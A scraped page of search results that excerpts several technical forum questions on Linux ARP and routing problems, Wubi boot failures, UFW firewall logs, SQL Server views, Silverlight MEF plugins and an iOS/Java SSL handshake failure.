Search Results

Search found 563 results on 23 pages for 'c (c1 0'.

Page 8/23 | < Previous Page | 4 5 6 7 8 9 10 11 12 13 14 15  | Next Page >

• linux routing bug?

  - by Balázs Pozsár

  I have been struggling with this not easily reproducible issue since a while. I am using linux kernel v3.1.0, and sometimes routing to a few IP addresses does not work. What seems to happen is that instead of sending the packet to the gateway, the kernel treats the destination address as local, and tries to gets its MAC address via ARP. For example, now my current IP address is 172.16.1.104/24, the gateway is 172.16.1.254: # ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:1B:63:97:FC:DC inet addr:172.16.1.104 Bcast:172.16.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:230772 errors:0 dropped:0 overruns:0 frame:0 TX packets:171013 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:191879370 (182.9 Mb) TX bytes:47173253 (44.9 Mb) Interrupt:17 # route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 172.16.1.254 0.0.0.0 UG 0 0 0 eth0 172.16.1.0 0.0.0.0 255.255.255.0 U 1 0 0 eth0 I can ping a few addresses, but not 172.16.0.59: # ping -c1 172.16.1.254 PING 172.16.1.254 (172.16.1.254) 56(84) bytes of data. 64 bytes from 172.16.1.254: icmp_seq=1 ttl=64 time=0.383 ms --- 172.16.1.254 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.383/0.383/0.383/0.000 ms root@pozsybook:~# ping -c1 172.16.0.1 PING 172.16.0.1 (172.16.0.1) 56(84) bytes of data. 64 bytes from 172.16.0.1: icmp_seq=1 ttl=63 time=5.54 ms --- 172.16.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 5.545/5.545/5.545/0.000 ms root@pozsybook:~# ping -c1 172.16.0.2 PING 172.16.0.2 (172.16.0.2) 56(84) bytes of data. 64 bytes from 172.16.0.2: icmp_seq=1 ttl=62 time=7.92 ms --- 172.16.0.2 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 7.925/7.925/7.925/0.000 ms root@pozsybook:~# ping -c1 172.16.0.59 PING 172.16.0.59 (172.16.0.59) 56(84) bytes of data. From 172.16.1.104 icmp_seq=1 Destination Host Unreachable --- 172.16.0.59 ping statistics --- 1 packets transmitted, 0 received, +1 errors, 100% packet loss, time 0ms When trying to ping 172.16.0.59, I can see in tcpdump that an ARP req was sent: # tcpdump -n -i eth0|grep ARP tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes 15:25:16.671217 ARP, Request who-has 172.16.0.59 tell 172.16.1.104, length 28 and /proc/net/arp has an incomplete entry for 172.16.0.59: # grep 172.16.0.59 /proc/net/arp 172.16.0.59 0x1 0x0 00:00:00:00:00:00 * eth0 Please note, that 172.16.0.59 is accessible from this LAN from other computers. Does anyone have any idea of what's going on? Thanks. update: replies to the comments below: there are no interfaces besides eth0 and lo the ARP req cannot be seen on the other end, but that's how it should work. the main problem is that an ARP req should not even be sent at the first place the problem persist even if I add an explicit route with the command "route add -host 172.16.0.59 gw 172.16.1.254 dev eth0"

  Read the article

• Ubuntu 12 crashed and took down network

  - by Leopd

  We recently set up a new Ubuntu 12.04LTS server on our network. It's not fully configured so it's not doing much beyond sshd and a default apache2 install. But this evening it appears to have crashed. It wasn't responding to the network or the keyboard. But the worst part is, it took down the entire network. My knowledge of the network stack below OSI layer 3 is very limited, so the rest confuses me. When this machine was physically connected to the network, no other machine could connect to the outside internet. When things were broken, running arp showed that our gateway's IP address (10.0.1.1) was listed as "invalid." Unplugging the server from the network fixed the problem, and plugging it back in broke it again. So the crashed server was advertising itself as owning the gateway's IP address? There's nothing at all in syslog during the time when it was causing problems. Any ideas about how to figure out what went wrong or what we can do to prevent it from happening again? I'm hesitant to even put the machine back on the network right now. Update ** It crashed again, and I ran tcpdump -penn arp (thanks bahamat!) for several minutes and got this... (timestamps and duplicate lines removed) 00:1e:65:f8:dc:24 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: Request who-has 10.0.1.1 tell 10.0.2.191, length 46 00:1e:65:f8:dc:24 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: Request who-has 10.0.1.44 tell 10.0.2.191, length 46 60:d8:19:d4:71:d6 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: Request who-has 10.0.1.1 tell 10.0.2.125, length 46 d4:9a:20:04:e9:78 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.1.1 tell 192.168.1.100, length 28 Update 2 ** When the network is functioning properly, arping -c4 10.0.1.1 returns this: ARPING 10.0.1.1 60 bytes from c0:c1:c0:77:25:8e (10.0.1.1): index=0 time=267.982 usec 60 bytes from c0:c1:c0:77:25:8e (10.0.1.1): index=1 time=422.955 usec 60 bytes from c0:c1:c0:77:25:8e (10.0.1.1): index=2 time=299.215 usec 60 bytes from c0:c1:c0:77:25:8e (10.0.1.1): index=3 time=366.926 usec --- 10.0.1.1 statistics --- 4 packets transmitted, 4 packets received, 0% unanswered (0 extra) When the bad server is plugged in, arping -c4 10.0.1.1 returns: ARPING 10.0.1.1 --- 10.0.1.1 statistics --- 4 packets transmitted, 0 packets received, 100% unanswered (0 extra) Context ** 10.0.x.x is the main subnet. 10.0.1.1 is the main internet gateway 10.0.1.44 is a printer 10.0.2.* devices are all laptops / workstations I have no idea what's using the 192.168.x.x subnet -- your guesses are at least as good as mine. A VM on a workstation? A misconfigured WAP? Somebody re-sharing wifi? A machine that failed to DHCP? The offending ubuntu server's MAC address ends in cd:80 so isn't listed in the dump. It should DHCP to 10.0.3.3 Thanks for any help. This ARP stuff is all voodoo to me. Packets just go to IP addresses, right? ;)

  Read the article

• No root file system is defined error after installation

  - by LearnCode

  I installed ubuntu through Wubi and once i rebooted I get no root file system defined error. here's the output of the boot_info_script.Could anyone point me out where the error is. Boot Info Script 0.60 from 17 May 2011 ============================= Boot Info Summary: =============================== => Windows is installed in the MBR of /dev/sda. => Windows is installed in the MBR of /dev/sdb. sda1: __________________________________________________________________________ File system: ntfs Boot sector type: Windows Vista/7 Boot sector info: No errors found in the Boot Parameter Block. Operating System: Windows 7 Boot files: /bootmgr /Boot/BCD /Windows/System32/winload.exe /ntldr /ntdetect.com /wubildr /ubuntu/winboot/wubildr /wubildr.mbr /ubuntu/winboot/wubildr.mbr /ubuntu/disks/root.disk /ubuntu/disks/swap.disk sda1/Wubi: _____________________________________________________________________ File system: Boot sector type: Unknown Boot sector info: Mounting failed: mount: unknown filesystem type '' sda2: __________________________________________________________________________ File system: vfat Boot sector type: Unknown Boot sector info: No errors found in the Boot Parameter Block. Operating System: Boot files: /boot.ini /ntldr /NTDETECT.COM sdb1: __________________________________________________________________________ File system: ntfs Boot sector type: Windows Vista/7 Boot sector info: No errors found in the Boot Parameter Block. Operating System: Boot files: ============================ Drive/Partition Info: ============================= Drive: sda _____________________________________________________________________ Disk /dev/sda: 160.0 GB, 160041885696 bytes 240 heads, 63 sectors/track, 20673 cylinders, total 312581808 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes Partition Boot Start Sector End Sector # of Sectors Id System /dev/sda1 * 63 301,250,879 301,250,817 7 NTFS / exFAT / HPFS /dev/sda2 301,250,943 312,575,759 11,324,817 c W95 FAT32 (LBA) GUID Partition Table detected, but does not seem to be used. Partition Start Sector End Sector # of Sectors System /dev/sda1 323,465,741,313,502,988275,962,973,585-323,465,465,350,529,402 - /dev/sda2 242,728,591,638,290,720578,721,383,108,845,578335,992,791,470,554,859 - /dev/sda3 1,827,498,311,425,204,2562,091,935,274,843,009,907264,436,963,417,805,652 - /dev/sda4 579,711,218,081,401,3572,006,665,459,744,645,1521,426,954,241,663,243,796 - /dev/sda11 270,286,346,402,038,1183,786,543,326,404,525,9543,516,256,980,002,487,837 - /dev/sda12 4,179,681,002,230,769,6684,179,389,374,010,033,387-291,628,220,736,280 - /dev/sda13 232,556,480,979,456,1311,160,152,593,793,119,235927,596,112,813,663,105 - /dev/sda14 98,342,784,050,266,9183,691,264,578,843,725,1953,592,921,794,793,458,278 - /dev/sda15 2,307,845,219,957,882,4961,850,841,032,955,276,350-457,004,187,002,606,145 - /dev/sda16 512,592,046,878,946,497368,458,231,024,779,444-144,133,815,854,167,052 - /dev/sda17 2,504,135,232,870,384,3923,665,087,872,719,320,8291,160,952,639,848,936,438 - /dev/sda18 3,783,181,605,270,691,304122,034,509,624,708,942-3,661,147,095,645,982,361 - /dev/sda19 3,519,661,520,275,829,5122,376,243,094,723,723,587-1,143,418,425,552,105,924 - /dev/sda20 3,867,920,076,859,0744,494,691,111,933,625,1044,490,823,191,856,766,031 - /dev/sda21 1,500,144,061,909,253,7612,511,182,033,846,676,3401,011,037,971,937,422,580 - /dev/sda22 13,035,625,499,900,0062,360,168,613,941,394,9472,347,132,988,441,494,942 - /dev/sda23 4,228,978,682,068,599,48813,159,423,631,648,263-4,215,819,258,436,951,224 - /dev/sda24 3,695,955,742,872,046,9084,561,928,726,501,845,776865,972,983,629,798,869 - /dev/sda25 1,297,460,286,683,948,0461,444,350,486,339,417,957146,890,199,655,469,912 - /dev/sda26 1,228,858,248,533,131,831 0-1,228,858,248,533,131,830 - /dev/sda121 3,189,184,846,146,487,1461,849,820,258,006,914,852-1,339,364,588,139,572,293 - /dev/sda122 1,226,215,547,991,800,578389,781,518,734,546,300-836,434,029,257,254,277 - /dev/sda123 3,851,660,168,574,583,4654,046,215,657,583,031,556194,555,489,008,448,092 - /dev/sda124 1,197,460,980,174,153,341699,103,965,005,093,246-498,357,015,169,060,094 - Drive: sdb _____________________________________________________________________ Disk /dev/sdb: 750.2 GB, 750153367552 bytes 255 heads, 63 sectors/track, 91200 cylinders, total 1465143296 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes Partition Boot Start Sector End Sector # of Sectors Id System /dev/sdb1 2,048 1,465,143,295 1,465,141,248 7 NTFS / exFAT / HPFS "blkid" output: ________________________________________________________________ Device UUID TYPE LABEL /dev/loop0 iso9660 Ubuntu 11.04 amd64 /dev/loop1 squashfs /dev/sda1 E814B55B14B52E06 ntfs /dev/sda2 01CD-023B vfat HP_RECOVERY /dev/sdb1 7836F22A36F1E8D0 ntfs Elements ================================ Mount points: ================================= Device Mount_Point Type Options /dev/loop0 /cdrom iso9660 (ro,noatime) /dev/loop1 /rofs squashfs (ro,noatime) /dev/sdb1 /mnt fuseblk (rw,nosuid,nodev,allow_other,blksize=4096) ================================ sda2/boot.ini: ================================ -------------------------------------------------------------------------------- [boot loader] timeout=0 default=C:\CMDCONS\BOOTSECT.DAT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect C:\CMDCONS\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons -------------------------------------------------------------------------------- ======================== Unknown MBRs/Boot Sectors/etc: ======================== Unknown GPT Partiton Type c104043000e9b9040dff24b580010100 Unknown GPT Partiton Type 46313020746f20737461727420746865 Unknown GPT Partiton Type 65727920706172746974696f6e207761 Unknown GPT Partiton Type 727920706172746974696f6e0d0a0000 Unknown GPT Partiton Type 000f84e5f7668b162404e82804744066 Unknown GPT Partiton Type ce01e8dc038bfe66391624047505e8d9 Unknown GPT Partiton Type 0345086603f0e881030bd2740333d240 Unknown GPT Partiton Type bece01e8db0287fec645041266895508 Unknown GPT Partiton Type 01f60634010175078b363b01e854f5e8 Unknown GPT Partiton Type 313825740ffec03865107408fec03824 Unknown GPT Partiton Type 02f60634014074088bfdbece01e85101 Unknown GPT Partiton Type 263401f9e894f30f858ef4e8e201e8ec Unknown GPT Partiton Type f7e960f35245434f5645525966606633 Unknown GPT Partiton Type 660faf1e00106603dac3668b0e001066 Unknown GPT Partiton Type 8bfd386d04740583c710e2f6c36660c6 Unknown GPT Partiton Type 04ebf132c0b91000f3aac3bf0c04ebf3 Unknown GPT Partiton Type 02662bc1660fb71e0e02662bc366031e Unknown GPT Partiton Type f4b40ebb0700b901003c08751381ff25 Unknown GPT Partiton Type 534f465448494e4b90653f62011b0100 Unknown GPT Partiton Type 0b050900027777772e68702e636f6d00 Unknown GPT Partiton Type d441a0f5030003000ecb744a08bb3746 Unknown GPT Partiton Type f8579a116b4a7aa931cde97a4b9b5c09 Unknown GPT Partiton Type 7229990415b77c0a1970e7e824237a3a Unknown GPT Partiton Type afb6e34d6b4bd8c7c0eada19a9786cc3 Unknown BootLoader on sda1/Wubi 00000000 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| * 00000200 Unknown BootLoader on sda2 00000000 e9 a7 00 52 45 43 4f 56 45 52 59 00 02 08 20 00 |...RECOVERY... .| 00000010 02 00 00 00 00 f8 00 00 3f 00 f0 00 7f b9 f4 11 |........?.......| 00000020 8c cd ac 00 1e 2b 00 00 00 00 00 00 02 00 00 00 |.....+..........| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 80 00 29 3b 02 cd 01 20 20 20 20 20 20 20 20 20 |..);... | 00000050 20 20 46 41 54 33 32 20 20 20 8b d0 c1 e2 02 80 | FAT32 ......| 00000060 e6 01 66 c1 e8 07 66 3b 46 f8 74 2a 66 89 46 f8 |..f...f;F.t*f.F.| 00000070 66 03 46 f4 66 0f b6 5e 28 80 e3 0f 74 0f 3a 5e |f.F.f..^(...t.:^| 00000080 10 0f 83 90 00 66 0f af 5e 24 66 03 c3 bb e0 07 |.....f..^$f.....| 00000090 b9 01 00 e8 cf 00 8b da 66 8b 87 00 7e 66 25 ff |........f...~f%.| 000000a0 ff ff 0f 66 3d f8 ff ff 0f c3 33 c9 8e d9 8e c1 |...f=.....3.....| 000000b0 8e d1 66 bc f4 7b 00 00 bd 00 7c 66 0f b6 46 10 |..f..{....|f..F.| 000000c0 66 f7 66 24 66 0f b7 56 0e 66 03 56 1c 66 89 56 |f.f$f..V.f.V.f.V| 000000d0 f4 66 03 c2 66 89 46 fc 66 c7 46 f8 ff ff ff ff |.f..f.F.f.F.....| 000000e0 66 8b 46 2c 66 50 e8 af 00 bb 70 00 b9 01 00 e8 |f.F,fP....p.....| 000000f0 73 00 bf 00 07 b1 0b be a9 7d f3 a6 74 2a 03 f9 |s........}..t*..| 00000100 83 c7 15 81 ff 00 09 72 ec 66 40 4a 75 db 66 58 |[email protected]| 00000110 e8 47 ff 72 cf be b4 7d ac 84 c0 74 09 b4 0e bb |.G.r...}...t....| 00000120 07 00 cd 10 eb f2 cd 19 66 58 ff 75 09 ff 75 0f |........fX.u..u.| 00000130 66 58 bb 00 20 66 83 f8 02 72 da 66 3d f8 ff ff |fX.. f...r.f=...| 00000140 0f 73 d2 66 50 e8 50 00 0f b6 4e 0d e8 16 00 c1 |.s.fP.P...N.....| 00000150 e1 05 03 d9 66 58 53 e8 00 ff 5b 72 d8 8a 56 40 |....fXS...[r..V@| 00000160 ea 00 00 00 20 66 60 66 6a 00 66 50 53 6a 00 66 |.... f`fj.fPSj.f| 00000170 68 10 00 01 00 8b f4 b8 00 42 8a 56 40 cd 13 be |h........B.V@...| 00000180 c7 7d 72 94 67 83 44 24 06 20 66 67 ff 44 24 08 |.}r.g.D$. fg.D$.| 00000190 e2 e3 83 c4 10 66 61 c3 66 48 66 48 66 0f b6 56 |.....fa.fHfHf..V| 000001a0 0d 66 f7 e2 66 03 46 fc c3 4e 54 4c 44 52 20 20 |.f..f.F..NTLDR | 000001b0 20 20 20 20 0d 0a 4e 6f 20 53 79 73 74 65 6d 20 | ..No System | 000001c0 44 69 73 6b 20 6f 72 0d 0a 44 69 73 6b 20 49 2f |Disk or..Disk I/| 000001d0 4f 20 65 72 72 6f 72 0d 0a 50 72 65 73 73 20 61 |O error..Press a| 000001e0 20 6b 65 79 20 74 6f 20 72 65 73 74 61 72 74 0d | key to restart.| 000001f0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa |..............U.| 00000200 =============================== StdErr Messages: =============================== umount: /isodevice: device is busy. (In some cases useful info about processes that use the device is found by lsof(8) or fuser(1))

  Read the article

• I have UFW block messages from local network machines, how can I analyse if they are malicious?

  - by Trygve

  I'm getting a lot of messages in my UFW log, and I'm trying to figure out if these are malicious or just normal. A UDP broadcast is coming from a windows laptop x.x.x.191, and some from our synology disks x.x.x.{6,8,10,11}. I have not figured out which macine 114 is yet. I would appreciate some advice in how to read the log, and get the most I can out of these calls. Oct 18 17:03:34 <myusername> kernel: [ 4034.755221] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:00:11:32:06:e8:19:08:00 SRC=x.x.x.6 DST=x.x.x.169 LEN=364 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=47978 LEN=344 Oct 18 17:03:34 <myusername> kernel: [ 4034.755292] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:00:11:32:1b:e8:8f:08:00 SRC=x.x.x.10 DST=x.x.x.169 LEN=366 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=47978 LEN=346 Oct 18 17:03:34 <myusername> kernel: [ 4034.756444] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:c0:c1:c0:52:18:ea:08:00 SRC=x.x.x.8 DST=x.x.x.169 LEN=294 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=47978 LEN=274 Oct 18 17:03:34 <myusername> kernel: [ 4034.756613] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:c0:c1:c0:52:18:ea:08:00 SRC=x.x.x.8 DST=x.x.x.169 LEN=306 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=47978 LEN=286 Oct 18 17:03:34 <myusername> kernel: [ 4034.760416] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:00:11:32:1e:6a:33:08:00 SRC=x.x.x.11 DST=x.x.x.169 LEN=366 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=47978 LEN=346 Oct 18 17:03:36 <myusername> kernel: [ 4036.215134] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=x.x.x.169 LEN=424 TOS=0x00 PREC=0x00 TTL=128 ID=11155 PROTO=UDP SPT=1900 DPT=47978 LEN=404 Oct 18 17:04:23 <myusername> kernel: [ 4083.853710] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=239.255.255.250 LEN=652 TOS=0x00 PREC=0x00 TTL=1 ID=11247 PROTO=UDP SPT=58930 DPT=3702 LEN=632 Oct 18 17:04:24 <myusername> kernel: [ 4084.063153] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=239.255.255.250 LEN=652 TOS=0x00 PREC=0x00 TTL=1 ID=11299 PROTO=UDP SPT=58930 DPT=3702 LEN=632 Oct 18 17:07:02 <myusername> kernel: [ 4242.153947] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=239.255.255.250 LEN=680 TOS=0x00 PREC=0x00 TTL=1 ID=18702 PROTO=UDP SPT=58930 DPT=3702 LEN=660 Oct 18 17:07:02 <myusername> kernel: [ 4242.275788] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=239.255.255.250 LEN=680 TOS=0x00 PREC=0x00 TTL=1 ID=18703 PROTO=UDP SPT=58930 DPT=3702 LEN=660 Oct 18 17:12:29 <myusername> kernel: [ 4569.073815] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=239.255.255.250 LEN=680 TOS=0x00 PREC=0x00 TTL=1 ID=30102 PROTO=UDP SPT=58930 DPT=3702 LEN=660 Oct 18 17:12:29 <myusername> kernel: [ 4569.242740] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=239.255.255.250 LEN=680 TOS=0x00 PREC=0x00 TTL=1 ID=30103 PROTO=UDP SPT=58930 DPT=3702 LEN=660 Oct 18 17:17:02 <myusername> kernel: [ 4841.440729] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=239.255.255.250 LEN=680 TOS=0x00 PREC=0x00 TTL=1 ID=9195 PROTO=UDP SPT=58930 DPT=3702 LEN=660 Oct 18 17:17:02 <myusername> kernel: [ 4841.553211] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=239.255.255.250 LEN=680 TOS=0x00 PREC=0x00 TTL=1 ID=9196 PROTO=UDP SPT=58930 DPT=3702 LEN=660 Oct 18 17:19:10 <myusername> kernel: [ 4969.294709] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:25:36:26:02:86:08:00 SRC=x.x.x.114 DST=239.255.255.250 LEN=923 TOS=0x00 PREC=0x00 TTL=1 ID=27103 PROTO=UDP SPT=3702 DPT=3702 LEN=903 Oct 18 17:19:10 <myusername> kernel: [ 4969.314553] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:7f:ff:fa:00:25:36:26:02:86:08:00 SRC=x.x.x.114 DST=239.255.255.250 LEN=923 TOS=0x00 PREC=0x00 TTL=1 ID=27104 PROTO=UDP SPT=3702 DPT=3702 LEN=903 Oct 18 17:33:34 <myusername> kernel: [ 5832.431610] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:00:11:32:1b:e8:8f:08:00 SRC=x.x.x.10 DST=x.x.x.169 LEN=366 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=55281 LEN=346 Oct 18 17:33:34 <myusername> kernel: [ 5832.431659] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:00:11:32:06:e8:19:08:00 SRC=x.x.x.6 DST=x.x.x.169 LEN=364 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=55281 LEN=344 Oct 18 17:33:34 <myusername> kernel: [ 5832.431865] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:00:11:32:1e:6a:33:08:00 SRC=x.x.x.11 DST=x.x.x.169 LEN=366 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=55281 LEN=346 Oct 18 17:33:34 <myusername> kernel: [ 5832.433024] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:c0:c1:c0:52:18:ea:08:00 SRC=x.x.x.8 DST=x.x.x.169 LEN=294 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=55281 LEN=274 Oct 18 17:33:34 <myusername> kernel: [ 5832.433224] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:c0:c1:c0:52:18:ea:08:00 SRC=x.x.x.8 DST=x.x.x.169 LEN=306 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=1900 DPT=55281 LEN=286 Oct 18 17:33:37 <myusername> kernel: [ 5834.914484] [UFW BLOCK] IN=eth0 OUT= MAC=f0:de:f1:71:c3:2e:00:22:19:de:80:a4:08:00 SRC=x.x.x.191 DST=x.x.x.169 LEN=424 TOS=0x00 PREC=0x00 TTL=128 ID=10075 PROTO=UDP SPT=1900 DPT=55281 LEN=404

  Read the article

• "select * from table" vs "select colA,colB,etc from table" interesting behaviour in SqlServer2005

  - by kristof

  Apology for a lengthy post but I needed to post some code to illustrate the problem. Inspired by the question What is the reason not to use select * ? posted a few minutes ago, I decided to point out some observations of the select * behaviour that I noticed some time ago. So let's the code speak for itself: IF EXISTS (SELECT * FROM sys.objects WHERE object_id = OBJECT_ID(N'[dbo].[starTest]') AND type in (N'U')) DROP TABLE [dbo].[starTest] CREATE TABLE [dbo].[starTest]( [id] [int] IDENTITY(1,1) NOT NULL, [A] [varchar](50) NULL, [B] [varchar](50) NULL, [C] [varchar](50) NULL ) ON [PRIMARY] GO insert into dbo.starTest(a,b,c) select 'a1','b1','c1' union all select 'a2','b2','c2' union all select 'a3','b3','c3' go IF EXISTS (SELECT * FROM sys.views WHERE object_id = OBJECT_ID(N'[dbo].[vStartest]')) DROP VIEW [dbo].[vStartest] go create view dbo.vStartest as select * from dbo.starTest go go IF EXISTS (SELECT * FROM sys.views WHERE object_id = OBJECT_ID(N'[dbo].[vExplicittest]')) DROP VIEW [dbo].[vExplicittest] go create view dbo.[vExplicittest] as select a,b,c from dbo.starTest go select a,b,c from dbo.vStartest select a,b,c from dbo.vExplicitTest IF EXISTS (SELECT * FROM sys.objects WHERE object_id = OBJECT_ID(N'[dbo].[starTest]') AND type in (N'U')) DROP TABLE [dbo].[starTest] CREATE TABLE [dbo].[starTest]( [id] [int] IDENTITY(1,1) NOT NULL, [A] [varchar](50) NULL, [B] [varchar](50) NULL, [D] [varchar](50) NULL, [C] [varchar](50) NULL ) ON [PRIMARY] GO insert into dbo.starTest(a,b,d,c) select 'a1','b1','d1','c1' union all select 'a2','b2','d2','c2' union all select 'a3','b3','d3','c3' select a,b,c from dbo.vExplicittest select a,b,c from dbo.vStartest If you execute the following query and look at the results of last 2 select statements, the results that you will see will be as follows: select a,b,c from dbo.vExplicittest a1 b1 c1 a2 b2 c2 a3 b3 c3 select a,b,c from dbo.vStartest a1 b1 d1 a2 b2 d2 a3 b3 d3 As you can see in the results of select a,b,c from dbo.vStartest the data of column c has been replaced with the data from colum d. I believe that is related to the way the views are compiled, my understanding is that the columns are mapped by column indexes (1,2,3,4) as apposed to names. I though I would post it as a warning for people using select * in their sql and experiencing unexpected behaviour. Note: If you rebuild the view that uses select * each time after you modify the table it will work as expected

  Read the article

• Quick MEF + SL4 question

  - by Tom Allen

  I'm working on an app in the Silverlight 4 RC and i'm taking the oppertunity to learn MEF for handling plugin controls. I've got it working in a pretty basic manor, but it's not exactly tidy and I know there is a better way of importing multiple xap's. Essentially, in the App.xaml of my host app, I've got the following telling MEF to load my xap's: AggregateCatalog catalog = new AggregateCatalog(); DeploymentCatalog c1 = new DeploymentCatalog(new Uri("TestPlugInA.xap", UriKind.Relative)); DeploymentCatalog c2 = new DeploymentCatalog(new Uri("TestPlugInB.xap", UriKind.Relative)); catalog.Catalogs.Add(c1); catalog.Catalogs.Add(c2); CompositionHost.Initialize(catalog); c1.DownloadAsync(); c2.DownloadAsync(); I'm sure I'm not using the AggregateCatalog fully here and I need to be able to load any xap's that might be in the directory, not just hardcoding Uri's obviously.... Also, in the MainPage.xaml.cs in the host I have the following collection which MEF puts the plugin's into: [ImportMany(AllowRecomposition = true)] public ObservableCollection<IPlugInApp> PlugIns { get; set; } Again, this works, but I'm pretty sure I'm using ImportMany incorrectly.... Finally, the MainPage.xaml.cs file implements IPartImportsSatisfiedNotification and I have the following for handling the plugin's once loaded: public void OnImportsSatisfied() { sp.Children.Clear(); foreach (IPlugInApp plugIn in PlugIns) { if (plugIn != null) sp.Children.Add(plugIn.GetUserControl()); } } This works, but it seems filthy that it runs n times (n being the number of xap's to load). I'm having to call sp.Children.Clear() as if I don't, when loading the 2 plugin's, my stack panel is populated as follows: TestPlugIn A TestPlugIn A TestPlugIn B I'm clearly missing something here. Can anyone point out what I should be doing? Thanks!

  Read the article

• Why does iOS 5 fail to connect to a server running JDK 1.6, but not JDK 1.5

  - by KC Baltz

  We have a Java Socket Server listening on an SSLSocket (port 443) and an iOS application that connects with it. When running on iOS 5.1, the application stopped working when we upgraded the Java version of the server from JDK 1.5 to 1.6 (or 1.7). The app connects just fine to JDK 5 and 6 when running on iOS 6. The iOS app is reporting an error: -9809 = errSSLCrypto. On the Java side, we get javax.net.ssl.SSLException: Received fatal alert: close_notify. On the Java server side, we have enabled all the available cipher suites. On the client side we have tested enabling several different suites, although we have yet to complete a test involving each one individually enabled. Right now, it is failing when we use TLS_DH_anon_WITH_AES_128_CBC_SHA although it has failed with others and we are starting to think it's not the suite. Here is the debug output. It makes it all the way to ServerHelloDone and then fails shortly thereafter: Is secure renegotiation: false [Raw read]: length = 5 0000: 16 03 03 00 41 ....A [Raw read]: length = 65 0000: 01 00 00 3D 03 03 50 83 1E 0B 56 19 25 65 C8 F2 ...=..P...V.%e.. 0010: AF 02 AD 48 FE E2 92 CF B8 D7 A6 A3 EA C5 FF 5D ...H...........] 0020: 74 0F 1B C1 99 18 00 00 08 00 FF 00 34 00 1B 00 t...........4... 0030: 18 01 00 00 0C 00 0D 00 08 00 06 05 01 04 01 02 ................ 0040: 01 . URT-, READ: Unknown-3.3 Handshake, length = 65 *** ClientHello, Unknown-3.3 RandomCookie: GMT: 1333992971 bytes = { 86, 25, 37, 101, 200, 242, 175, 2, 173, 72, 254, 226, 146, 207, 184, 215, 166, 163, 234, 197, 255, 93, 116, 15, 27, 193, 153, 24 } Session ID: {} Cipher Suites: 